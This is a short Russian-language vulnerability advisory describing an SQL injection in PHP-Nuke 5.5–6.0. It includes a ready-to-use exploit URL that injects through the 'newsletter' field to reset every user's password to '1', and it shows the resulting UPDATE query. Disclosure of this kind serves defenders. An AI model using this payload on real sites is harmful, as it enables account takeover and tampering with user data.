PHP-Nuke - система управления контентом, написанная на PHP.
PHP-Nuke уязвим к нападению SQL injection, которая позволяет атакующему изменять существующий SQL запрос и модифицировать информацию в базе данных. Следующий пример изменит все пароли пользователей PHP-Nuke на '1'. Эксплуатация требует, чтобы атакующий вошел в систему и определил свой UID, просматривая код страницы. Если UID атакующего равен 2, то он может начать нападение, запрашивая следующий URL: 

modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage= 
no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/* 

Введенный запрос построен следующим образом: 

 PDATE nuke_users 
 SET name = '', 
 email = '', 
 femail = '', 
 url = 'http://', 
 pass = 'xxxxx', 
+--[ bio = '\', 
|    user_avatar = '', 
|    user_icq = '', 
|    user_occ = '', 
|    user_from = '', 
|    user_intrest = '', 
|    user_sig = '', 
|    user_aim = '', 
|    user_yim = '', 
|    user_msnm = '', 
+--[ newsletter = ', 
 bio=0,pass=md5(1)/*' WHERE uid='2' 

Уязвимость обнаружена в PHP-Nuke 5.5-6.0.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии